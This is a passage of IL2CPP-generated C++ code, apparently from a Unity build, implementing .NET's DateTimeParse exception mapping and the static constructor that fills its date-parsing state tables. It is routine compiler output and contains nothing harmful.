(DateTimeParse_GetDateTimeParseException_m26091CD2EBBFFEA867F71D3910742714FF38F733_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t V_0 = 0; { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_0 = ___result0; int32_t L_1 = L_0->get_failure_12(); V_0 = L_1; int32_t L_2 = V_0; switch (((int32_t)il2cpp_codegen_subtract((int32_t)L_2, (int32_t)1))) { case 0: { goto IL_0021; } case 1: { goto IL_0038; } case 2: { goto IL_0049; } case 3: { goto IL_0069; } } } { goto IL_0089; } IL_0021: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_3 = ___result0; String_t* L_4 = L_3->get_failureArgumentName_15(); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_5 = ___result0; String_t* L_6 = L_5->get_failureMessageID_13(); String_t* L_7 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(L_6, /*hidden argument*/NULL); ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD * L_8 = (ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD *)il2cpp_codegen_object_new(ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD_il2cpp_TypeInfo_var); ArgumentNullException__ctor_m9EA692D49986AEBAC433CE3381331146109AE20F(L_8, L_4, L_7, /*hidden argument*/NULL); return L_8; } IL_0038: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_9 = ___result0; String_t* L_10 = L_9->get_failureMessageID_13(); String_t* L_11 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(L_10, /*hidden argument*/NULL); FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC * L_12 = (FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC *)il2cpp_codegen_object_new(FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC_il2cpp_TypeInfo_var); FormatException__ctor_m89167FF9884AE20232190FE9286DC50E146A4F14(L_12, L_11, /*hidden argument*/NULL); return L_12; } IL_0049: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_13 = ___result0; String_t* L_14 = L_13->get_failureMessageID_13(); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_15 = (ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A*)SZArrayNew(ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A_il2cpp_TypeInfo_var, (uint32_t)1); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_16 = L_15; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_17 = ___result0; RuntimeObject * L_18 = L_17->get_failureMessageFormatArgument_14(); ArrayElementTypeCheck (L_16, L_18); (L_16)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(0), (RuntimeObject *)L_18); String_t* L_19 = Environment_GetResourceString_m7389941B4C0688D875CC647D99A739DA2F907ADB(L_14, L_16, /*hidden argument*/NULL); FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC * L_20 = (FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC *)il2cpp_codegen_object_new(FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC_il2cpp_TypeInfo_var); FormatException__ctor_m89167FF9884AE20232190FE9286DC50E146A4F14(L_20, L_19, /*hidden argument*/NULL); return L_20; } IL_0069: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_21 = ___result0; String_t* L_22 = L_21->get_failureMessageID_13(); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_23 = (ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A*)SZArrayNew(ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A_il2cpp_TypeInfo_var, (uint32_t)1); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_24 = L_23; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_25 = ___result0; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_26 = L_25->get_calendar_10(); ArrayElementTypeCheck (L_24, L_26); (L_24)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(0), (RuntimeObject *)L_26); String_t* L_27 = Environment_GetResourceString_m7389941B4C0688D875CC647D99A739DA2F907ADB(L_22, L_24, /*hidden argument*/NULL); FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC * L_28 = (FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC *)il2cpp_codegen_object_new(FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC_il2cpp_TypeInfo_var); FormatException__ctor_m89167FF9884AE20232190FE9286DC50E146A4F14(L_28, L_27, /*hidden argument*/NULL); return L_28; } IL_0089: { return (Exception_t *)NULL; } } // System.Void System.DateTimeParse::.cctor() extern "C" IL2CPP_METHOD_ATTR void DateTimeParse__cctor_m54E56E6CC8F71DAD2091E80C571ECD977998F445 (const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse__cctor_m54E56E6CC8F71DAD2091E80C571ECD977998F445_MetadataUsageId); s_Il2CppMethodInitialized = true; } { MatchNumberDelegate_t15412AE1CF0D1909CB05C7DBB8079E9281CCA05D * L_0 = (MatchNumberDelegate_t15412AE1CF0D1909CB05C7DBB8079E9281CCA05D *)il2cpp_codegen_object_new(MatchNumberDelegate_t15412AE1CF0D1909CB05C7DBB8079E9281CCA05D_il2cpp_TypeInfo_var); MatchNumberDelegate__ctor_m9E0CFF7DE8D941AD5D703F3F76E387EF5E5E4DC2(L_0, NULL, (intptr_t)((intptr_t)DateTimeParse_MatchHebrewDigits_mAE589497302D66173A915086EFA3D4523966822E_RuntimeMethod_var), /*hidden argument*/NULL); ((DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_StaticFields*)il2cpp_codegen_static_fields_for(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var))->set_m_hebrewNumberParser_0(L_0); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_1 = (DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1*)SZArrayNew(DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1_il2cpp_TypeInfo_var, (uint32_t)((int32_t)20)); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_2 = L_1; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_3 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)SZArrayNew(DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E_il2cpp_TypeInfo_var, (uint32_t)((int32_t)18)); DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_4 = L_3; RuntimeFieldHandle_t844BDF00E8E6FE69D9AEAA7657F09018B864F4EF L_5 = { reinterpret_cast<intptr_t> (U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____94841DD2F330CCB1089BF413E4FA9B04505152E2_76_FieldInfo_var) }; RuntimeHelpers_InitializeArray_m29F50CDFEEE0AB868200291366253DD4737BC76A((RuntimeArray *)(RuntimeArray *)L_4, L_5, /*hidden argument*/NULL); ArrayElementTypeCheck (L_2, L_4); (L_2)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(0), (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)L_4); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_6 = L_2; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_7 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)SZArrayNew(DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E_il2cpp_TypeInfo_var, (uint32_t)((int32_t)18)); DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_8 = L_7; RuntimeFieldHandle_t844BDF00E8E6FE69D9AEAA7657F09018B864F4EF L_9 = { reinterpret_cast<intptr_t> (U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____973417296623D8DC6961B09664E54039E44CA5D8_79_FieldInfo_var) }; RuntimeHelpers_InitializeArray_m29F50CDFEEE0AB868200291366253DD4737BC76A((RuntimeArray *)(RuntimeArray *)L_8, L_9, /*hidden argument*/NULL); ArrayElementTypeCheck (L_6, L_8); (L_6)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(1), (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)L_8); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_10 = L_6; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_11 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)SZArrayNew(DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E_il2cpp_TypeInfo_var, (uint32_t)((int32_t)18)); DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_12 = L_11; RuntimeFieldHandle_t844BDF00E8E6FE69D9AEAA7657F09018B864F4EF L_13 = { reinterpret_cast<intptr_t> (U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____F37E34BEADB04F34FCC31078A59F49856CA83D5B_131_FieldInfo_var) }; RuntimeHelpers_InitializeArray_m29F50CDFEEE0AB868200291366253DD4737BC76A((RuntimeArray *)(RuntimeArray *)L_12, L_13, /*hidden argument*/NULL); ArrayElementTypeCheck (L_10, L_12); (L_10)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(2), (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)L_12); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_14 = L_10; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_15 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)SZArrayNew(DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E_il2cpp_TypeInfo_var, (uint32_t)((int32_t)18)); DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_16 = L_15; RuntimeFieldHandle_t844BDF00E8E6FE69D9AEAA7657F09018B864F4EF L_17 = { reinterpret_cast<intptr_t> (U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____34476C29F6F81C989CFCA42F7C06E84C66236834_21_FieldInfo_var) }; RuntimeHelpers_InitializeArray_m29F50CDFEEE0AB868200291366253DD4737BC76A((RuntimeArray *)(RuntimeArray *)L_16, L_17, /*hidden argument*/NULL); ArrayElementTypeCheck (L_14, L_16); (L_14)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(3), (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)L_16); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_18 = L_14; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_19 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)SZArrayNew(DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E_il2cpp_TypeInfo_var, (uint32_t)((int32_t)18)); DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_20 = L_19; RuntimeFieldHandle_t844BDF00E8E6FE69D9AEAA7657F09018B864F4EF L_21 = { reinterpret_cast<intptr_t> (U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____95C48758CAE1715783472FB073AB158AB8A0AB2A_78_FieldInfo_var) }; RuntimeHelpers_InitializeArray_m29F50CDFEEE0AB868200291366253DD4737BC76A((RuntimeArray *)(RuntimeArray *)L_20, L_21, /*hidden argument*/NULL); ArrayElementTypeCheck (L_18, L_20); (L_18)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(4), (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)L_20); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_22 = L_18; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_23 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)SZArrayNew(DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E_il2cpp_TypeInfo_var, (uint32_t)((int32_t)18)); DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_24 = L_23; RuntimeFieldHandle_t844BDF00E8E6FE69D9AEAA7657F09018B864F4EF L_25 = { reinterpret_cast<intptr_t> (U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____BEBC9ECC660A13EFC359BA3383411F698CFF25DB_101_FieldInfo_var) }; RuntimeHelpers_InitializeArray_m29F50CDFEEE0AB868200291366253DD4737BC76A((RuntimeArray *)(RuntimeArray *)L_24, L_25, /*hidden argument*/NULL); ArrayElementTypeCheck (L_22, L_24); (L_22)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(5), (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)L_24); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_26 = L_22; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_27 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)SZArrayNew(DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E_il2cpp_TypeInfo_var, (uint32_t)((int32_t)18)); DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_28 = L_27; RuntimeFieldHandle_t844BDF00E8E6FE69D9AEAA7657F09018B864F4EF L_29 = { reinterpret_cast<intptr_t> (U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____5BFE2819B4778217C56416C7585FF0E56EBACD89_46_FieldInfo_var) }; RuntimeHelpers_InitializeArray_m29F50CDFEEE0AB868200291366253DD4737BC76A((RuntimeArray *)(RuntimeArray *)L_28, L_29, /*hidden argument*/NULL); ArrayElementTypeCheck (L_26, L_28); (L_26)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(6), (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)L_28); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_30 = L_26; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_31 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)SZArrayNew(DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E_il2cpp_TypeInfo_var, (uint32_t)((int32_t)18)); DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_32 = L_31; RuntimeFieldHandle_t844BDF00E8E6FE69D9AEAA7657F09018B864F4EF L_33 = { reinterpret_cast<intptr_t> (U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____AC791C4F39504D1184B73478943D0636258DA7B1_91_FieldInfo_var) }; RuntimeHelpers_InitializeArray_m29F50CDFEEE0AB868200291366253DD4737BC76A((RuntimeArray *)(RuntimeArray *)L_32, L_33, /*hidden argument*/NULL); ArrayElementTypeCheck (L_30, L_32); (L_30)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(7), (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)L_32); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_34 = L_30; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_35 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)SZArrayNew(DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E_il2cpp_TypeInfo_var, (uint32_t)((int32_t)18)); DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_36 = L_35; RuntimeFieldHandle_t844BDF00E8E6FE69D9AEAA7657F09018B864F4EF L_37 = { reinterpret_cast<intptr_t> (U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____3FE6C283BCF384FD2C8789880DFF59664E2AB4A1_30_FieldInfo_var) }; RuntimeHelpers_InitializeArray_m29F50CDFEEE0AB868200291366253DD4737BC76A((RuntimeArray *)(RuntimeArray *)L_36, L_37, /*hidden argument*/NULL); ArrayElementTypeCheck (L_34, L_36); (L_34)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(8), (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)L_36); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_38 = L_34; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_39 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)SZArrayNew(DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E_il2cpp_TypeInfo_var, (uint32_t)((int32_t)18)); DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_40 = L_39; RuntimeFieldHandle_t844BDF00E8E6FE69D9AEAA7657F09018B864F4EF L_41 = { reinterpret_cast<intptr_t> (U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____2F71D2DA12F3CD0A6A112F5A5A75B4FDC6FE8547_19_FieldInfo_var) }; RuntimeHelpers_InitializeArray_m29F50CDFEEE0AB868200291366253DD4737BC76A((RuntimeArray *)(RuntimeArray *)L_40, L_41, /*hidden argument*/NULL); ArrayElementTypeCheck (L_38, L_40); (L_38)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(((int32_t)9)), (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)L_40); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_42 = L_38; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_43 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)SZArrayNew(DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E_il2cpp_TypeInfo_var, (uint32_t)((int32_t)18)); DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_44 = L_43; RuntimeFieldHandle_t844BDF00E8E6FE69D9AEAA7657F09018B864F4EF L_45 = { reinterpret_cast<intptr_t> (U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____67EEAD805D708D9AA4E14BF747E44CED801744F3_52_FieldInfo_var) }; RuntimeHelpers_InitializeArray_m29F50CDFEEE0AB868200291366253DD4737BC76A((RuntimeArray *)(RuntimeArray *)L_44, L_45, /*hidden argument*/NULL); ArrayElementTypeCheck (L_42, L_44); (L_42)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(((int32_t)10)), (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)L_44); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_46 = L_42; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_47 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)SZArrayNew(DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E_il2cpp_TypeInfo_var, (uint32_t)((int32_t)18)); DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_48 = L_47; RuntimeFieldHandle_t844BDF00E8E6FE69D9AEAA7657F09018B864F4EF L_49 = { reinterpret_cast<intptr_t> (U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____536422B321459B242ADED7240B7447E904E083E3_38_FieldInfo_var) }; RuntimeHelpers_InitializeArray_m29F50CDFEEE0AB868200291366253DD4737BC76A((RuntimeArray *)(RuntimeArray *)L_48, L_49, /*hidden argument*/NULL); ArrayElementTypeCheck (L_46, L_48); (L_46)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(((int32_t)11)), (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)L_48); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_50 = L_46; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_51 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)SZArrayNew(DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E_il2cpp_TypeInfo_var, (uint32_t)((int32_t)18)); DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_52 = L_51; RuntimeFieldHandle_t844BDF00E8E6FE69D9AEAA7657F09018B864F4EF L_53 = { reinterpret_cast<intptr_t> (U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____0588059ACBD52F7EA2835882F977A9CF72EB9775_1_FieldInfo_var) }; RuntimeHelpers_InitializeArray_m29F50CDFEEE0AB868200291366253DD4737BC76A((RuntimeArray *)(RuntimeArray *)L_52, L_53, /*hidden argument*/NULL); ArrayElementTypeCheck (L_50, L_52); (L_50)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(((int32_t)12)), (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)L_52); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_54 = L_50; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_55 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)SZArrayNew(DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E_il2cpp_TypeInfo_var, (uint32_t)((int32_t)18)); DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_56 = L_55; RuntimeFieldHandle_t844BDF00E8E6FE69D9AEAA7657F09018B864F4EF L_57 = { reinterpret_cast<intptr_t> (U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____39C9CE73C7B0619D409EF28344F687C1B5C130FE_26_FieldInfo_var) }; RuntimeHelpers_InitializeArray_m29F50CDFEEE0AB868200291366253DD4737BC76A((RuntimeArray *)(RuntimeArray *)L_56, L_57, /*hidden argument*/NULL); ArrayElementTypeCheck (L_54, L_56); (L_54)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(((int32_t)13)), (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)L_56); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_58 = L_54; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_59 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)SZArrayNew(DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E_il2cpp_TypeInfo_var, (uint32_t)((int32_t)18)); DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_60 = L_59; RuntimeFieldHandle_t844BDF00E8E6FE69D9AEAA7657F09018B864F4EF L_61 = { reinterpret_cast<intptr_t> (U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____7341C933A70EAE383CC50C4B945ADB8E08F06737_60_FieldInfo_var) }; RuntimeHelpers_InitializeArray_m29F50CDFEEE0AB868200291366253DD4737BC76A((RuntimeArray *)(RuntimeArray *)L_60, L_61, /*hidden argument*/NULL); ArrayElementTypeCheck (L_58, L_60); (L_58)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(((int32_t)14)), (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)L_60); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_62 = L_58; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_63 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)SZArrayNew(DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E_il2cpp_TypeInfo_var, (uint32_t)((int32_t)18)); DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_64 = L_63; RuntimeFieldHandle_t844BDF00E8E6FE69D9AEAA7657F09018B864F4EF L_65 = { reinterpret_cast<intptr_t> (U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____A6732F8E7FC23766AB329B492D6BF82E3B33233F_88_FieldInfo_var) }; RuntimeHelpers_InitializeArray_m29F50CDFEEE0AB868200291366253DD4737BC76A((RuntimeArray *)(RuntimeArray *)L_64, L_65, /*hidden argument*/NULL); ArrayElementTypeCheck (L_62, L_64); (L_62)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(((int32_t)15)), (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)L_64); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_66 = L_62; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_67 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)SZArrayNew(DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E_il2cpp_TypeInfo_var, (uint32_t)((int32_t)18)); DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_68 = L_67; RuntimeFieldHandle_t844BDF00E8E6FE69D9AEAA7657F09018B864F4EF L_69 = { reinterpret_cast<intptr_t> (U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____EC89C317EA2BF49A70EFF5E89C691E34733D7C37_127_FieldInfo_var) }; RuntimeHelpers_InitializeArray_m29F50CDFEEE0AB868200291366253DD4737BC76A((RuntimeArray *)(RuntimeArray *)L_68, L_69, /*hidden argument*/NULL); ArrayElementTypeCheck (L_66, L_68); (L_66)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(((int32_t)16)), (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)L_68); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_70 = L_66; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_71 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)SZArrayNew(DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E_il2cpp_TypeInfo_var, (uint32_t)((int32_t)18)); DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_72 = L_71; RuntimeFieldHandle_t844BDF00E8E6FE69D9AEAA7657F09018B864F4EF L_73 = { reinterpret_cast<intptr_t> (U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____4858DB4AA76D3933F1CA9E6712D4FDB16903F628_35_FieldInfo_var) }; RuntimeHelpers_InitializeArray_m29F50CDFEEE0AB868200291366253DD4737BC76A((RuntimeArray *)(RuntimeArray *)L_72, L_73, /*hidden argument*/NULL); ArrayElementTypeCheck (L_70, L_72); (L_70)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(((int32_t)17)), (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)L_72); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_74 = L_70; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_75 = 